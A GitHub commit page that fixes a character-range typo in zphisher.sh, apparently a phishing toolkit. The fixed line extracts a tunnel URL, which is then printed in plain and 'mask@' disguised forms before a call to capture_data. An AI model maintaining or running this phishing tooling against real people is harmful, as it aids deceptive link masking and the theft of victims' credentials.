Skip to content

Commit 694eb34

Browse files
authored
Fix
Sorry i didn't see becoz my device is to choopy
1 parent a02e805 commit 694eb34

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

zphisher.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -483,7 +483,7 @@ start_loclx() {
483483
fi
484484

485485
{ sleep 12; clear; banner_small; }
486-
loclx_url=$(cat .server/.loclx | grep -o '[0-9a-zA-z.]*.loclx.io') #DONE :)
486+
loclx_url=$(cat .server/.loclx | grep -o '[0-9a-zA-Z.]*.loclx.io') #DONE :)
487487
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}http://$loclx_url"
488488
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$loclx_url"
489489
capture_data

0 commit comments

Comments
 (0)